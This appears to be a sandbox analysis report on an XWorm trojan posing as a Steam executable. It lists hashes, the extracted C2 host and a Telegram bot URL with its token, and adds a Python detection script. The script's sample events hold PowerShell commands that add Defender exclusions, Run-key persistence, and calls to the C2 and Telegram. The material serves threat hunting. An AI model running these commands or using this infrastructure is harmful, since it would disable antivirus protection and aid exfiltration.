General

  • Target

    Steam (3).exe

  • Size

    787KB

  • Sample

    240527-j4467aec77

  • MD5

    2330d80ec71accda8181221b2aaa204f

  • SHA1

    1f6fd799124e3e599947b60b1054478ad49aa503

  • SHA256

    eb0eac20db3f8e71bc53d2527452cf18acb95b7541cdf61c6520d113194f7cc6

  • SHA512

    e0d9c136eebb923f0e4a8437b73d44a2613aa62f9b70cca305254a866b3027a04c70185027ce6d5a55ff401557fd50d1687ff3dd11ab6e9e7a803be346e6796b

  • SSDEEP

    24576:Wz86IxgoQ2lvi2LV8jTPJ5LuWkUbG2heonbM0gGfcqAWtDToI9AIN:pzLu55LuWksPkonbM0B9ug

Malware Config

Extracted

Family

xworm

C2

region-vip.gl.at.ply.gg:52733

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Steam.exe

  • telegram

    https://api.telegram.org/bot7186793142:AAGFJjLyhOIBEPcbCbAu3hrbmYsgQ5hzhf4/sendMessage?chat_id=5288662132

Targets

    • Target

      Steam (3).exe

    • Size

      787KB

    • MD5

      2330d80ec71accda8181221b2aaa204f

    • SHA1

      1f6fd799124e3e599947b60b1054478ad49aa503

    • SHA256

      eb0eac20db3f8e71bc53d2527452cf18acb95b7541cdf61c6520d113194f7cc6

    • SHA512

      e0d9c136eebb923f0e4a8437b73d44a2613aa62f9b70cca305254a866b3027a04c70185027ce6d5a55ff401557fd50d1687ff3dd11ab6e9e7a803be346e6796b

    • SSDEEP

      24576:Wz86IxgoQ2lvi2LV8jTPJ5LuWkUbG2heonbM0gGfcqAWtDToI9AIN:pzLu55LuWksPkonbM0B9ug

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes so the dropped payload is not scanned.

    • Adds Run key to start application
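The extracted configuration above (C2 host and port, install directory and file, Telegram bot URL) and the behavioural signatures (PowerShell Defender exclusions, Run key persistence) map directly onto telemetry a defender can hunt. The script below is an added example, not part of the sandbox report or the XWorm tooling: it turns the report's indicators into simple detections and runs them over a handful of constructed process, registry, network and file events (the events are made up to mirror the reported behaviour; they are not the sandbox's own logs). The tag names and the `Event` shape are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators taken from the report above.
C2_HOST = "region-vip.gl.at.ply.gg"
C2_PORT = 52733
TELEGRAM_BOT_ID = "7186793142"      # numeric prefix of the bot token in the extracted URL
TELEGRAM_CHAT_ID = "5288662132"
INSTALL_FILE = "steam.exe"          # install_file, dropped under %ProgramData%
SAMPLE_SHA256 = "eb0eac20db3f8e71bc53d2527452cf18acb95b7541cdf61c6520d113194f7cc6"

# T1059.001: Add-MpPreference / Set-MpPreference with any of the exclusion switches.
DEFENDER_EXCL_RE = re.compile(
    r"\b(Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I | re.S)
# T1547.001: a value written under the per-user or machine Run key.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
# Telegram Bot API call; bot id and chat_id are compared against the extracted config.
TELEGRAM_RE = re.compile(
    r"api\.telegram\.org/bot(\d+):[\w-]+/sendMessage\?chat_id=(\d+)", re.I)


@dataclass
class Event:
    kind: str   # "process", "registry", "network" or "file" (hypothetical schema)
    data: str   # command line, "key = value", "host:port" / URL, or "path sha256"


def classify(ev: Event) -> List[str]:
    """Return the detection tags that fire for one event (empty list if none)."""
    tags: List[str] = []
    low = ev.data.lower()
    if ev.kind == "process" and DEFENDER_EXCL_RE.search(ev.data):
        tags.append("defender_exclusion_tamper")
    if ev.kind == "registry" and RUN_KEY_RE.search(ev.data):
        tags.append("run_key_persistence")
        # Persistence pointing at the reported install path is a much stronger signal.
        if "programdata" in low and INSTALL_FILE in low:
            tags.append("xworm_install_path")
    if ev.kind == "network":
        if f"{C2_HOST}:{C2_PORT}".lower() in low:
            tags.append("xworm_c2")
        m = TELEGRAM_RE.search(ev.data)
        if m and m.group(1) == TELEGRAM_BOT_ID and m.group(2) == TELEGRAM_CHAT_ID:
            tags.append("telegram_exfil_channel")
    if ev.kind == "file" and SAMPLE_SHA256 in low:
        tags.append("known_sample_sha256")
    return tags


def scan(events: List[Event]) -> Dict[str, List[int]]:
    """Map each tag to the indices of the events that triggered it."""
    hits: Dict[str, List[int]] = {}
    for i, ev in enumerate(events):
        for t in classify(ev):
            hits.setdefault(t, []).append(i)
    return hits


# Constructed sample telemetry (not from the sandbox run), in the order the
# reported behaviours would occur on an infected host.
SAMPLE_EVENTS = [
    Event("process", r'powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Steam.exe"'),
    Event("process", r'powershell.exe -Command "Add-MpPreference -ExclusionProcess Steam.exe; Add-MpPreference -ExclusionExtension exe"'),
    Event("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Steam = C:\ProgramData\Steam.exe"),
    Event("network", "tcp connect region-vip.gl.at.ply.gg:52733"),
    Event("network", "GET https://api.telegram.org/bot7186793142:AAGFJjLyhOIBEPcbCbAu3hrbmYsgQ5hzhf4/sendMessage?chat_id=5288662132"),
    Event("process", "powershell.exe -Command Get-Date"),  # benign control, should not fire
    Event("file", r"C:\ProgramData\Steam.exe " + SAMPLE_SHA256),
]

if __name__ == "__main__":
    for tag, idx in scan(SAMPLE_EVENTS).items():
        print(f"{tag:26} events {idx}")
```

The Defender and Run key rules are generic and will also fire on legitimate administration, so treat them as triage signals; the C2 host:port, the Telegram bot/chat pair and the SHA256 are specific to this sample and can be alerted on directly. Note that the C2 is a playit.gg tunnel hostname, so the resolved IP may change while the hostname and port stay useful.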

MITRE ATT&CK Enterprise v15

Tasks